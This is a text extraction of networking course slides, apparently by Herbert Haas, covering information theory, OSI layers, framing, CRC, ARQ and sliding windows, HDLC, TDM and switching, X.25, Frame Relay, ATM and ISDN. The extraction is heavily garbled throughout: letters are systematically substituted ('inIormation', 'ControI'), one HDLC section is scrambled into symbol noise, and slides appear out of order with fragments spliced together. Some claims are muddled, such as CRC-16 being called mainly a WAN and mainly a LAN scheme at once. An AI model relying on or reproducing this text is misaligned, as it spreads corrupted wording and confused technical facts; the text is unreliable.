Académique Documents
Professionnel Documents
Culture Documents
Carried by symboIs
Scripture
VoItage IeveIs
Light puIses
BIue WhaIe Sonagrams
What is a good inIormation source? From a theoretical point oI view a random
pattern is the best because you'll never know what comes next. On the other hand,
iI you receive a continous stream oI the same symbol this would be boring. More
than boring: there is no inIormation in it, because you can predict what comes
next! From this we conclude that a sophisticated coding representing the
inIormation as eIIicient as possible using symbols is a critical step during the
communication process.
Throughout these chapters we will mainly deal with symbols such as voltage
levels or light pulses.
Look at the Blue Whale Sonograms. The x-axis represents time, the y-axis
Irequency and the color represents power density. This communication pattern is
very complex (those oI dolphins is even more complex). It is known that each
herd has their own traditional hymn. And: they like to communicate!
5
5 {C} Herbert Haas 2010/02/15
SymboIs on Wire
Discrete voItage IeveIs = "DigitaI"
Binary (easiest)
No cIocking wire
ExampIe: AWGN-channeI
C = B Iog (1 + S/N)
The great inIormation theory guru Claude E. Shannon made a great discovery in
1948. BeIore 1948, it was commonly assumed, that there is no way to guarantee
an error-less transmission over a noisy channel. However, Shannon showes that
transmission without errors is possible when the inIormation rate is below the so-
called channel capacity, which depends on bandwidth and signal-to-noise ratio.
This discovery is regarded as one oI the most important achievements in
communication theory.
19
19 {C} Herbert Haas 2010/02/15
Bitrate vs Baud
Ensure interoperabiIity
Created by a standardization
organization
Operating system
Programming Language
PracticaIIy, the OSI modeI
Organizes knowIedge
LAN: 802.2
CLNP
IP, IPX
Q.931, X.25
AppIication Layer
Transport Layer
Network Layer
Data Link Layer
PhysicaI Layer
Session Layer
Presentation Layer
The network layer builds the so-called "packet". Layer 3 transports the packets
between the diIIerent networks. ThereIore layer 3 needs structured and routable
addresses to Iind the right networks. IP is the most important Layer 3 protocol
today (IPv4 has a structured 4 byte address). The OSI Connectionless Network
Protocol (CLNP) is another example Ior a layer-3 protocol but it is not so
widely used today, except some Telcos and Carriers use it Ior internal
purposes. IPX has been developed by Novell in order to extend Novell
networks over diIIerent data-link layer worlds. Q.931 is the ISDN layer 3
carried over the D-channel and is used Ior signaling purposes. Basically Q.931
conveys the telephone numbers and other service parameters. The classical
packet-switched WAN standard X.25 actually speciIies only the layer 3 oI this
technology and is used to set up a number oI virtual calls over an asynchronous
link layer (LAPB).
17
17 {C} Herbert Haas 2009/08/12
Transport Layer
ReIiabIe transport of
segments between
appIications
AppIication muItipIexing
through T-SAPs
Sequence numbers and
FIow controI
OptionaI QoS CapabiIities
ExampIes:
TCP (UDP)
Synchronization Points
LittIe capabiIities, usuaIIy
not impIemented or part of
appIication Iayer
A set of entities
Interface
Part of IDU
Part of IDU
Data
TypicaIIy a 0101010...-pattern
bit-patterns or code-vioIations
Byte-Stuffing
Bit-Stuffing
DATA ControI FCS ED SD PreambIe ED SD
! !
In the case that a special bit pattern is used to indicate the start and end oI a
Irame, it is necessary to prevent this pattern inside the data portion oI the
Irame. Otherwise this would lead to Irame misinterpretation.
There are two principle methods to achieve this goal either by modiIying single
bits oI the data stream (bit-stuIIing) or by replacing the whole byte (byte-
stuIIing).
7
7 {C} Herbert Haas 2005/03/11
Byte Stuffing
Some character-oriented protocoIs
divide data stream into frames
CRC-16: x
16
+x
15
+x
2
+1
CRC-CCITT: x
16
+x
12
+x
5
+1
Checksums which are built on basis oI the XOR operation do not provide a
reliable detection scheme against error bursts.
ThereIore the Cycle Redundancy Check is based on mathematical polynomial
equations and it is capable to detect even bursts oI erroneous bits inside the
data stream.
A single set oI check bits is generated using an polynomial equation Ior each
transmitted Irame and appended to the tail oI the Irame by the sender. The
receiver then perIorms the same computation on the complete Irame and
compares the received checksum with its own calculated checksum.
There are a lot oI diIIerent standardized polynomial equations like the CRC-16,
CRC-32 or the CRC-CCITT equations.
The CRC-16 check Ior example will detect all error bursts oI less than 16 bits
and most error bursts greater than 16 bits. The CRC-16 and the CRC-CCITT
are mainly used in WAN technologies, while the CRC-16 is mainly used in
LAN environments.
It is quite simple to implement these CRC checks in Hardware with the use oI
16 or 32 bit long shiIt registers.
14
14 {C} Herbert Haas 2005/03/11
Forward Error Correction
Required for "extreme" conditions
Addressing
Sequence numbers
AcknowIedgement FIag
Frame Type
SignaIIing information
The contents oI the control Iield depends on the tasks that need to be
perIormed by the Data-link protocol.
So the control Iield could contain:
Address inIormation Ior addressing especially in point to multipoint
environments
Sequence numbers that can be seen like serial numbers Ior each single Irame
Acknowledgement Flags to indicate that the data was received properly
Frame Type inIormation to indicate whether it`s a Irame that carries data or
control inIormation
Service Access Point (SAP) or payload type inIormation to indicate what is
transported by the Irame
Signaling inIormation in case oI connection oriented protocols to build up an
connection
16
16 {C} Herbert Haas 2005/03/11
Connection-Oriented ProtocoIs
Different definitions
Connection estabIishment
Disconnect
KeepaIive
ARQ possibIe (Error Recovery)
Obviously it takes some time to establish a connection beIore the data is
allowed to Ilow. But the establishment delay is typically in the range oI
milliseconds. Even ISDN provides a connection establishment worldwide in
less than one second.
A traIIic descriptor may be used optionally Ior all technologies that support
Quality oI Service Ieatures. The traIIic descriptor holds the inIormation about
the service parameters, e.g. delay, burst size etc, that should be used Ior this
connection.
There are also separate Irame types deIined Ior connection establishment,
disconnect procedures and keep-alives.
The use oI Automatic Repeat Requests (ARQ) is optional depending on the
technology used. The purpose oI the ARQ is to provide error recovery in case
oI transmission Iailures.
20
20 {C} Herbert Haas 2005/03/11
Automatic Repeat Request
ARQ protocoIs guarantee correct
deIivery of data
Retransmission Timers
Retransmission Buffers
TCP
Variant known as "fast retransmit"
Uses dupIicate acks as NACK
The GoBackN procedure is used by the quite old HDLC protocol because
reordering oI data packets was a too much time and memory consuming task
Ior processors in the early days oI data communication.
Also in today's TCP implementation a variant oI the NACK procedure is used,
the duplicate ACK. As soon as an TCP Stack recognizes that a data Irame is
missing it sends out an duplicate acknowledgement. So the sender recognizes
that a data Irame was lost and retransmits the according data Irame. This
speeds up the error recovery procedure because the retransmission timeout is
omitted in his case.
37
37 {C} Herbert Haas 2005/03/11
SeIective Reject ARQ
Modern modification of GoBack N
OnIy those frames are retransmitted
that receive a NACK
EarIy TCP
The positive ACK procedure is always used together with cumulative
acknowledgement technology. Disordering oI data Irames may occur and must
be Iixed. Only timeouts trigger retransmissions oI lost data Irames.
40
40 {C} Herbert Haas 2005/03/11
Windowing
As shown, sender must buffer
unacknowIedged frames in case for
retransmissions
Necessary sender-buffer size is
caIIed "window"
Window size depends on
Bandwidth of channeI
Round-Trip-Time (RTT)
The sender needs to buIIer all transmitted Irames until the according
acknowledgement arrives. The size oI this transmit buIIer is called the window
size.
The optimum window size directly depends on the bandwidth oI the channel as
well as on the Round-Trip-Time.
Elder protocols use a Iixed window size negotiated during connection setup.
More modern protocols such as TCP use a method called adaptive windowing
which allows to automatically adapt the window size to needs oI the transport
system.
41
41 {C} Herbert Haas 2005/03/11
Remember: FuII Pipe !
Vienna Tokyo
t = 0 s
t = 350 ms
1
K
B
D
a
ta
A
c
k
1.5 Mbit/s
This situation
corresponds with a
sIiding window
In this scenario a proper window size is used which guaranties a most eIIicient
use oI the transport capacity.
42
42 {C} Herbert Haas 2005/03/11
SIiding Window Basics (1)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
Frames to be sent
Window
Frames
on fIight
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
Frames to be sent
Window
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
AIready sent
and acknowIedged
Window
Frames to be sent
A
c
k
=
3
A
c
k
=
7
In this example a Iixed window size oI Iour is used. This means that up to Iour
data Irames without explicit acknowledgments may be sent.
As soon as the Iirst ACK 3 arrives the sliding window moves to the leIt. This
is possible because the data Irames 1 and 2 are now removed out oI the send
buIIer. Now the data Irames 5 and 6 are sent and kept in the send buIIer until
their acknowledgements arrive.
On the leIt side oI the window we Iind the data Irames that will be sent in the
Iuture, while on the right side oI the sliding window already sent and
acknowledged Irames can be Iound. So the window moves continuously Irom
right to leIt thereIore the name sliding window.
43
43 {C} Herbert Haas 2005/03/11
SIiding Window Basics (2)
Window Size in Bytes = BW RTT
At Ieast W+1
If aII W frames must be retransmitted,
receiver must distinguish from new data
W < (MaxSeqNum+1) /2
To avoid troubIes on wrap around
Assume we have a window size W4 and the same number oI identiIiers
(sequence numbers 0..3). When we send Iour Irames at once and unIortunately
all coresponding acknowledgements get lost, our timers expire and we must
retransmit those Irames. Now we again send Irames 0..3 but the receiver cannot
recognize them as the second incarnation. Thus, the Iirst real new Irame must
have a sequence number oI 4, that is the next Irames have identiIiers 4, 0, 1, 2.
The result is that we need at least W1 identiIiers.
Even then, another tricky scenario might happen. Assume we have a sequence
number space 0..7 (8 identiIiers) and W7. We send Irames 0,1,2,3,4,5,6 and
get all acknowledgements. Then we send 7, 0, 1, 2, 3, 4, 5. How can the
receiver be sure that Irames 0,1,2,3,4,5 are not retransmitted Irames? (Irame 7
might get lost!)
Because oI this, we use a smaller window size W4. Now we send Irames
0,1,2,3 and get all acknowledgements. Then we send 4,5,6,7. The receiver is
not conIused.
So the Iinal rule requires W to be smaller than halI the number oI identiIers.
44
44 {C} Herbert Haas 2005/03/11
Jumping Window
Vienna Tokyo
In this example we Iind what will happen iI the window size is to small.
The sender in Vienna has sent out all data Irames until he reached the max
window size. Now the sender in Vienna has to wait Ior acknowledgments to
arrive.
The incoming acknowledgements Iree up buIIer space and the sender may
continou to send. In this scenario the chosen window size is obviously to small
leading to an insuIIicient use oI the transport capacity.
45
45 {C} Herbert Haas 2005/03/11
Jumping Window
Vienna Tokyo
Evidently, this speciIic situation depicted above, can only occur when the
senders employs a dynamic window size (assume the sender started with W20
and suddenly reduced the window size to W4.
46
46 {C} Herbert Haas 2005/03/11
FIow ControI
Too Iarge window sizes
TCP's approach
Stop and Go
CoIIisions possibIe
Connectionoriented or connectionless
'ra&ing
'ra&e (rotection
!other o$ &any L#) and W#) protocols
3 (C) Herbert Haas 2005/03/11
Hal$-Duple% !anage&ent
!ode& !ode&
*+S
C+S
DCD
!ode& !ode&
*+S
C+S DCD
(,- D#+# (,- D#+#
',- D#+# ',- D#+#
',. D#+#
!ode& !ode&
(,. D#+#
*+S
C+S
DCD
!ode& !ode&
*+S
C+S DCD
4 (C) Herbert Haas 2005/03/11
Sa&e on !ultipoint Lines (."
(ri&ary
Station
Secondary
Stations
(,-, #,C/ D#+#
C. C/ C/ C0 C1
(,., #,C/ D#+#
C. C/ C/ C0 C1
5 (C) Herbert Haas 2005/03/11
Sa&e on !ultipoint Lines (/"
(ri&ary
Station
Secondary
Stations
#,C/, ',- D#+#
C. C/ C/ C0 C1
C. C/ C/ C0 C1
#,C/, ',. D#+#
6 (C) Herbert Haas 2005/03/11
Early HDLC E%a&ple
Mainframe
FEP M M MSD
CC1
M
Terminal
Terminal
Terminal
M
MSD CC2 M M CC2
Terminal
Terminal
Terminal
Terminal
Terminal
Escon
B! Channel
23--44.2/-- 5it6s
HDLC
CC1
D+E
D+E
DCE DCE
+oken
*ing
+oken
*ing
7 (C) Herbert Haas 2005/03/11
HDLC Basics (."
Synchronous +rans&ission
Bit-oriented (Bit-Stu$$ing"
Developed 5y S7
Supports
'ra&ing
'ra&e protection
Error recovery
Building Blocks
(ri&ary Station
Secondary Station
Co&5ined Station
+hree &odes
)*!
#*!
#B!
Windo9 si<es
E%tensions, etc444
18 (C) Herbert Haas 2005/03/11
#*= (."
HCheckpointingH
What is Cisco-HDLC ?
Most important
StatisticaIIy dimensioned
Frames can have different size
MuItipIexers require buffers
VariabIe deIays
Address information required
Not protocoI transparent
Statistical TDM allows a good utilization oI the trunk because there is no waste oI
bandwidth by the use oI idle patterns and the capacity is determined by the
average needs oI the users.
The Irame size may vary depending on the need oI the users.
BuIIering is required under trunk overload conditions.
The delay is variable because oI buIIering.
Address inIormation is needed because oI the lost correlation between time slot
position and destination.
Statistical TDM is not protocol transparent because a separate packing as well as
addresses are needed.
12
12 {C} Herbert Haas 2005/03/11
Networking: FuIIy Meshed
User A
User B
User C
User D
User F
User E
MetcaIfe's Law:
n(n-1)/2 Iinks
Good fauIt
toIerance
Expensive
A Iully meshed network is a thing that everybody wants, because it gives 100
redundancy and optimized data transport to each destination. But unIortunately
only very Iew can eIIort it, because the costs oI network inIrastructure would
grow with MetcalI s law.
Which is expressed by the Iormula n x (n-1)/2 .This means iI you have ten sites
you want to connect in an any to any topology you would need 45 connections.
13
13 {C} Herbert Haas 2005/03/11
Networking: Switching
User A
User B
User C
User D
User F
User E
OnIy 6 Iinks
Switch supports
either
deterministic or
statisticaI TDM
One way to save costs would be the use oI network switches, which are
responsible Ior handling the traIIic between the diIIerent destinations.
The switches may use a technology either based on deterministic or statistical
TDM. In this case we would need only six links instead oI IiIteen links to
establish communication between all sites.
14
14 {C} Herbert Haas 2005/03/11
Circuit Switching
T1
T2
T3
TA T2
T3
T1
T4 T4
T4 T4 T1 TB
User A2
User B5
TA(1) T1(4) : A1-C9
TA(2) T2(7) : A2-B5
TA(3) T2(6) : A3-D1
. . . . . .
. . . . . .
T2(6) T4(1)
T2(7) T3(18)
. . . . . .
. . . . . .
T3(18) T4(5)
T3(19) T1(1)
. . . . . .
. . . . . .
T4(4) TB(9)
T4(5) TB(5)
. . . . . .
TA(2) T2(7) : A2-B5
T2(7) T3(18)
T3(18) T4(5)
T4(5) TB(5)
Circuit switching technology is based on deterministic TDM.
All network switches in circuit switching technology hold a switching table which
determines the correlation between incoming trunk/timeslot and outgoing
trunk/timeslot.
In our example the connection between user A2 and B5 is established by Iour
network switches and their according switching tables. For both users this
connection looks like a dedicated point to point link, they are not aware what's
going on inside the network cloud.
15
15 {C} Herbert Haas 2005/03/11
Circuit Switching - Facts
Based on deterministic TDM
MinimaI deIay
ProtocoI transparent
ConnectionIess
Routing TabIe
LocaI addresses
Connectionoriented
Switching TabIe
There are two major technologies that make use oI the statistical TDM principle.
The Datagram principle which is using global unique and routable addresses.
Data Iorwarding decisions are made by statically or dynamically generated
routing tables and the data transport is connectionless. Examples Ior the
Datagram principle are IP, IPX, Appletalk, etc.
The Virtual Call principle uses locally signiIicant address well known under the
term virtual circuit identiIier. The data transport is done connection-oriented and
the Iorwarding decisions are made by switching tables. The switching tables hold
the inIormation about incoming trunk/circuit identiIier and the corresponding
outgoing trunk/circuit identiIier. Examples Ior Virtual Call services are X25,
Frame-relay, ATM, etc.
19
19 {C} Herbert Haas 2005/03/11
Datagram
User A.2
User B.5
R1 R2
R4
R3
R5
Destination Next Hop
A IocaI
B R2
C R2
..... .....
A2 B5
A2 B5
A2 B5
Destination Next Hop
A R1
B R4
C R3
..... .....
A
2
B
5
Destination Next Hop
A R2
B R5
C R2
..... .....
A2 B5
Destination Next Hop
A R4
B IocaI
C R4
..... .....
In the Datagram technology user A.2 sends out data packets destined Ior the user
B.5. Each single datagram holds the inIormation about sender and receiver
address.
The datagram Iorwarding devices in our example routers hold a routing table in
memory. In the routing table we Iind a correlation between the destination address
oI a data packet and the corresponding outgoing interIace as well as the next hop
router. So data packets are Iorwarded through the network on a hop by hop basis.
The routing tables can be set up either by manual conIiguration oI the
administrator or by the help oI dynamic routing protocols like RIP, OSPF, IS-IS,
etc. The use oI dynamic routing protocols may lead to rerouting decisions in case
oI network Iailure and so packet overtaking may happen in these systems.
20
20 {C} Herbert Haas 2005/03/11
Datagram - Facts (1)
Addresses contain topoIogicaI information
Static (manuaIIy)
Sequence is guaranteed
LCN (X.25)
VPI/VCI (ATM)
All WAN-switching technologies utilize the same principle that has been
described above. But the connection identiIer has diIIerent names. In X.25 we call
it the Logical Channel Number (LCN). With Frame Relay we talk about the Data
Link Connection IdentiIier (DLCI). And ATM packets are switched using the
Virtual Path IdentiIier/Virtual Circuit IdentiIier (VPI/VCI). No matter what
complicated names are used, it is simply a dumb identiIier without any special
meaning.
31
31 {C} Herbert Haas 2005/03/11
ExampIe
BANG
This example shows us what will happen iI a node in the center oI a network
collapses. All connection through the collapsed node are torn down and new
connections using signaling needs to be established. This causes a lot oI overhead
through to new connection setup requests. In Virtual Call Service technology its
up to the end devices to set up a new connection through the network.
In Datagram technology this problem would be Iixed by the network itselI by
rerouting.
32
32 {C} Herbert Haas 2005/03/11
Two Service Types
Switched VirtuaI Circuit (SVC)
ExampIe: Datex-P
Adopted and extended by ISO
Identifies connection
FIow controI
Window size
Transit deIay
The X.25 standard describes a number oI so-called "Iacilities" that identiIy or
enhance a X.25 session. There are two types oI Iacilities: essential and
optional.
X.25 supports various packet sizes up to 4 KB. The maximal data rate deIined
Ior X.25 is 2 Mbit/s.
17
17 {C} Herbert Haas 2005/03/11
X.25 FaciIities (2)
OptionaI FaciIities
Reverse charging
Hunt groups
CaII redirection
Negotiation oI optional Iacilities can be done in advance between user and
service provider, by online-registration or during call setup.
REJ support means optional ARQ on layer 3. This service utilizes the so-called
"D-bit" explained later. Fast Select allows to send data immediately with the
Iirst packet that is sent Ior connection establishment. This Ieature was invented
especially Ior credit-card transactions to speed up this payment method. Closed
user groups guarantee privacy so that only dedicated users can communicate
very important Ior commercial networks. Reverse charging is one oI the
unpleasant Iacilities. DTEs can be collected to a so-called hunt group to
improve accessibleness. II an incoming call occurs each DTE within a hunt
group is alerted, Iollowing a predeIined order. Call redirection is a comIortable
Ieature that let others do your job.
18
18 {C} Herbert Haas 2005/03/11
Fragmentation (1)
Switch may fragment packets
Buffering
QuaIity of Service
Congestion controI
The most important diIIerence to X.25 is the lack oI error recovery and Ilow
control. Note that X.25 perIorms error recovery and Ilow control on each link
(other than TCP Ior example). Obviously this extreme reliable service suIIers
on delays. But Frame Relay is an ISDN applicationand ISDN provides
reliable physical links, so why use ARQ techniques on lower layers at all?
The second important diIIerence is that X.25 send virtual circuit service
packets and data packets in the same virtual circuit. This is called "Inband
Signaling". Frame Relay establishes a dedicated virtual circuit Ior signaling
purposes only.
Thirdly, Frame Relay can deal with traIIic parameters such as "Committed
InIormation Rate" (CIR) and "Ecxess InIormation Rate" (EIR). That is, the
Frame Relay provider guarantees the delivery oI data packets below the CIR
and oIIers at least a best-eIIort service Ior higher data rates. We will discuss
this later in much greater detail.
And Iinally, although Frame Relay does not retransmit dropped Irames, the
network at least responds with congestion indication messages to choke the
user's traIIic.
Basically, Frame Relay can be viewed as a streamlined version oI X.25,
especially tuned to achieve low delays.
4
4 {C} Herbert Haas 2005/03/11
History of Frame ReIay
First proposaIs 1984 by CCITT
SIow progress
1990: Cisco, Northern TeIecom, StrataCom,
and DEC founded the Gang of Four (GoF)
Identifies connection
Specified in Q.922
Q.922 consists of
Based on Q.921
T1.618 is based on a subset of
T1.602 caIIed the "core aspects"
ITU-T X.21
ANSI T1.403 (DS1, 1.544 Mbps)
ITU-T V.35
Bit stuffing
Congestion controI
The Q922 Annex A or the T1.618 ANSI cover Iollowing tasks:
Both describe the multiplexing oI diIIerent communication channels on one
physical connection by the help oI the according DLCI.
Frame alignment which means start and end oI Irame detection plus
synchronization with the help oI the HDLC Ilag.
Bit stuIIing to prevent the appearance oI the Flag bit pattern inside the payload
area oI the Irame.
16 bit Cycle Redundancy Check Ior error detection inside the Frame-relay
network. Frames in error will be discarded only, there are no error recovery
Iunctions implemented.
Determination oI maximum and minimum Frame-relay Irame sizes depending
on the conIigurations (e.g. voice)
Congestion control and indication with the help oI the FECN, BECN bits or
the CLLM system.
23
23 {C} Herbert Haas 2005/03/11
The Frame ReIay Frame
FIag Header Information FCS
DLCI (MSB)
FIag
C/R EA DLCI (LSB)
FE
CN
BE
CN
DE EA
1 2 3 4 5 6 7 8 1 2 3 4 5 6 7 8
Legend: Legend:
DLCI Data Link Connection Identifier
C/R Command/Respond
EA Extended Addressing
FECN Forward ExpIicit Congestion Notification
BECN Backward ExpIicit Congestion Notification
DE Discard EIigibiIity
1 2 2 1
The DLCI Iield length is typically 10 bits. Optionally, it can be extended using
the EA bit (max 16 bits according FRF and GOF). The EA bits are used such
that the Iirst and middle DLCI address octets are indicated by EA0 whereas
the last address octet is indicated by EA1.
Note that the second address octet always contains:
The FECN, BECN, and DE bit. Currently only 10 bit DLCIs are supported,
but the EA Ilag allows the use oI longer DLCIs in the Iuture. Today, MPLS
utilizes the Extended Address Iield oI the FR header.
The C/R bit is a rudimentary bit, inherited Irom HDLC. It is not used within
Frame Relay!
According to FRF, the maximum length oI the inIormation Iield is 1600 bytes.
The other standards allow lengths up to 8192 (theoretically) but the CRC-16
only protects 4096 bytes. Practically, maximimum Irame siztes oI up to 1600
bytes are used.
The usage oI the FECN and BECN bit is explained in a Iew seconds...
24
24 {C} Herbert Haas 2005/03/11
Congestion ControI (1)
FECN indicates congestion to the receiver
BECN indicates congestion to the sender
ProbIem: DTEs do not need to react (!)
FECN
BECN
congested
The Frame-relay network is able to indicate congestion situations to its users
by the help oI the BECN and FECN bit located in the Frame-relay header.
With the help oI these two bits not only a congestion situation but also the
direction oI the congestion can be indicated. In the direction oI the congestion
the FECN bit in the Frame-relay header oI the by passing packets is set, by the
congested Frame-relay switch, while in the opposite direction the BECN bit
will be set.
25
25 {C} Herbert Haas 2005/03/11
Congestion ControI (2)
Routers can be configured to react
upon receiving a BECN
OnIy a few higher Iayer protocoIs
react upon receiving a FECN
DLCI 1023
Before congestion, DCE sends CLLM
message to DTE
AR > CIR
Sporadic bursts can use Iine up to AR
OptionaIIy Iimited by
Excess Information Rate (EIR)
As already discussed beIore the main parameters that determine the transport
capacity oI a Frame-relay connection are the physical AR, the CIR and the
Excess InIormation Rate (EIR).
Typically the capacity oI the CIR is guaranteed by the service provider at any
time. In burst situations the customer may try to send more data than the CIR
allows, but Ior this additional data no guarantees Ior delivery are given by the
service provider.
Most service provider allow over utilization up to the AR, some others may
limit the over utilization with a separate traIIic parameter called the EIR.
31
31 {C} Herbert Haas 2005/03/11
Bursty Traffic (2)
CIR and EIR are defined via a
measurement intervaI Tc
Users task
Provider's task
GIobaI Addressing
Status messages
MuIticasting
LMI is more of a protocoI than an
interface (!)
The Local Management InterIace (LMI) is a protocol that runs on a reserved
DLCI to supply you with inIormation about the conditions oI your PVCs.
But it also supports global addressing and the use oI multicast PVCs.
43
43 {C} Herbert Haas 2005/03/11
LMI DetaiIs
Three LMI Types
DLCI 0
FECN, BECN
Frame ReIay Forum, ITU-T, and ANSI
52
52 {C} Herbert Haas 2005/03/11
Quiz
What's the Tc when using Voice over
Frame ReIay?
What's the main difference between
FR and Ethernet, when putting IP
upon them?
What's the typicaI practicaI usage of
BECN?
53
53 {C} Herbert Haas 2005/03/11
Hints
Q1: MiIIiseconds (min 10 ms)
Q2: Broadcast medium. Main
probIem with routing protocoIs
Q3: BECN is used by the provider to
throttIe the customer if he vioIates
the traffic contract
1
2005/03/11 {C} Herbert Haas
ATM Introduction
The Grand Unification
2
2 {C} Herbert Haas 2005/03/11
Agenda
What is it? Who wants it? Who did it?
Header and Switching
ATM Layer Hypercube
Adaptation Layers
SignaIing
Addresses
3
3 {C} Herbert Haas 2005/03/11
What is ATM ?
High-Speed VirtuaI Circuits
No error recovery
UNI and NNI defined
Constant frame sizes CeIIs
Based on B-ISDN specifications
Recommendation I.121
To acceIerate deveIopment
Line coding
SignaI conversions
28 {C} Herbert Haas 2005/03/11
Interface ExampIes
Standard Speed Medium Comments Encoding Connector Usage
SDH STM-1 155,52 Coax 75 Ohm CM BNC WAN
PDH E4 139,264 Coax 75 Ohm CM BNC WAN
PDH DS3 44,736 Coax 75 Ohm B3ZS BNC WAN
PDH E3 34,368 Coax 75 Ohm HDB3 BNC WAN
PDH E2 8,448 Coax 75 Ohm HDB3 BNC WAN
PDH J2 6,312 TP/Coax 110/75 Ohm B6ZS/B8ZS RJ45/BNC WAN
PDH E1 2,048 TP/Coax 120/75 Ohm HDB3 9pinD/BNC WAN
PDH DS1 1,544 TP 100 Ohm AM/B8ZS RJ45/RJ48 WAN
SDH STM-4 622,08 SM fiber SDH SC LAN/WAN
SDH STM-1 155,52 SM fiber SDH ST LAN/WAN
SDH STM-1 155,52 MM fiber 62,5 um SDH SC LAN/WAN
SDH STM-4 622,08 SM fiber NRZ SC (ST) LAN
SDH STM-4 622,08 MM (LED) NRZ SC (ST) LAN
SDH STM-4 622,08 MM (Laser) NRZ SC (ST) LAN
SDH STM-1 155,52 UTP5 100 Ohm NRZ RJ45 LAN
SDH STM1 155,52 STP (Type1) 150 Ohm NRZ 9pinD LAN
Fber Channel 155,52 MM fiber 62,5 um 8B/10B LAN
TAX 100 MM Fiber 62,5 um 4B/5B MC LAN
SONET STS1 51,84 UTP3 NRZ RJ45 LAN
ATM 25 25,6 UTP3 NRZ RJ45 LAN
29 {C} Herbert Haas 2005/03/11
ATM Layer
MuItipIexing and demuItipIexing of
ceIIs according VPI/VCI
Switching of ceIIs
"LabeI swapping"
Such as IP or IPX
Because of simiIarity both adaptation
Iayers were combined to AAL3/4
40
40 {C} Herbert Haas 2005/03/11
AAL3/4
Can muItipIex different streams of data
on the same ATM connection
Length unnecessary
Convergence Layer:
8 byte traiIer in Iast ceII
SAR Layer:
just marks EOM in ATM header (PT)
AAL5 is the most widely used AAL today. Also UNI signaling, ILMI and PNNI
signaling is done upon AAL5.
44 {C} Herbert Haas 2005/03/11
Packets and CeII Loss (2)
CeIIs of damaged packets are stiII
forwarded by ATM switches
Constant deIays
Constant bandwidth
Dynamic connection estabIishment
User initiated
TemporariIy
ISDN speciIies only a User to Network InterIace (UNI)quite similar than X.25
and Frame Relay. But the main diIIerence is that ISDN relies on deterministic,
synchronized multiplexing.
Two data rates were deIined: The Basic Rate Interface (BRI) and the Primary
Rate Interface (PRI). Both are explained on the next pages in more detail.
Synchronous and deterministic multiplexing provides constant delays and
bandwidth. ThereIore, a user can able to put any type oI traIIic upon this layer
it works Iully transparent!
The connections are established dynamically by a signaling protocol. The user
dials a number and a temporary connection is created. The signaling protocol is
the Iamous "Q.931". It is explained later but you should try to memorize it even
by now.
5
5 {C} Herbert Haas 2005/03/11
Basic Rate Interface (BRI)
2 Bearer (B) channeIs with 64 kbit/s
each
1 Data (D) channeI with 16 kbit/s
SuppIementary services
Reverse charging
Hunt groups
etc...
The CCITT (today known as ITU-T) deIined three services Ior ISDN..
Bearer services deIine transport oI inIormation in real time without alteration oI
the content oI the message. Both circuit mode and packet mode (virtual call and
permanent virtual circuit) is supported.
Teleservices combine transportation Iunction with inIormation-processing
Iunctions, e.g. telephony, teletex, teleIax, videotex, and telex.
Supplementary services can be used to enhance bearer or teleservices.
Examples Ior supplementary services are reverse charging, closed user group, line
hunting, call Iorwarding, calling-line-identiIication, multiple subscriber number
(MSN), and subaddressing.
8
8 {C} Herbert Haas 2005/03/11
FunctionaI Groups
TerminaI Equipment (TE)
Point-to-point
Maximum distance between TE and NT is
1km (!)
Requires a PBX
MuItipoint
Up to 8 TEs can share the bus
Maximum distance between TE and NT is
200 meters (short bus) or 500 meters
(extended bus)
An ISDN interIace can be conIigured either in multipoint mode or in point-to-
point mode.
The point-to-point mode is the normal connection mode Ior business ISDN users.
The user can attach only one single devices to the ISDN connection which will
have to handle all calls (typically a PBX will be used).
The ISDN provider will assign a range oI numbers to the ISDN connection. Any
call within this number range will be sent to the user. The ISDN provider will
leave assignment oI the last digits oI the telephone number to the ISDN user. This
setup usually allows Ior additional Ieatures, but is also more expensive.
17
17 {C} Herbert Haas 2005/03/11
MuItipoint Configuration
D channeI is shared by aII TEs
Contention mode
B channeIs are dynamicaIIy assigned
to TEs
Bit-stuffing
30 B channeIs
1 Framing ChanneI
USA: T1
23 B channeIs
1 D channeI
The T1 Irame synchronization is achieved using a single bit at the beginning oI the
Irame. Both E1 and T1 are explained in another module (Telco Backbones).
23
23 {C} Herbert Haas 2005/03/11
LAPD (Q.921)
Link Access Procedure D-ChanneI
By switch (ET)
"Identifies payIoad"
0 signaIing information (s-type)
16 packet data (p-type)
63 management information
Additionally a Service Access Point IdentiIier (SAPI) is needed to identiIy the
content oI this LAPD Irame. Each SAPI number identiIies a layer 3 service. For
example Q.931 services might be addressed or the SAPI might also indicate that
the LAPD payload is a X.25 data Irame.
28
28 {C} Herbert Haas 2005/03/11
TEI Management Messages
UI frames with SAPI = 63 and TEI 127
Information fieId contains
Message type
Also management messages are identiIed by a special SAPI (63), combined with a
TEI oI 127, which addresses all TEs (broadcast). These management messages are
used to assign TEIs to the TEs.
Examples Ior message types are:
IDRequest, IDCheck Response, IDVeriIy (TE to NT) and
IDAssigned, IDDenied, IDCheck Request, IDRemove (NT to TE)
29
29 {C} Herbert Haas 2005/03/11
Q.931
Carries signaIing information
CaII controI
Terminated by ET
ET is reaI 7-Iayer gateway
Shannon
Jitter
Compounding Iaws
DigitaI Hierarchies
PDH
SONET/SDH
This chapter gives an introduction into the complex world oI Telco technologies.
First we discuss transmission basics related to voice and scalability issues.
In order to understand these technologies it is important to know about Shannon's
laws, jitter problems, signal to noise problems, and digital hierarchy concepts.
AIter this basics sections this chapter presents two important Telco backbone
technologies, PDH and SONET/SDH.
4
4 {C} Herbert Haas 2005/03/11
Long History
Origins in Iate 19th century
Voice was/is the yardstick
Same terms
Over decades
WorId-wide!
AvaiIabiIity
Remote controI
TeIemetry
Realtime traIIic does not necessarily require "Iast" transmission. It only demands
Ior "Iast enough" transmission. That is, a bounded delay is deIined within all
required data must be received.
9
9 {C} Herbert Haas 2005/03/11
SoIutions
Isochronous network
ISDN PRI
Leased Iine
In the middle oI the 20th century, the telephony network inIrastructure was still
analog and very complex. Each connection was realized by a dedicated bundle oI
wires and all terminated in the central oIIice. Signaling was slow and primitive
and switching a time consuming process. Furthermore speech quality degraded on
long haul connections.
In the 1960s digital backbones were created and also digital signaling protocols
such has SS#7. Central oIIice equipment became smaller and more eIIicient and
the number oI wires were reduced drastically. This technology was called
Plesiochronous Digital Hierarchy (PDH) and is based on synchronous TDM,
however it was not Iully synchronous because oI technical restrictions oI that days.
PDH is still important and used today.
12
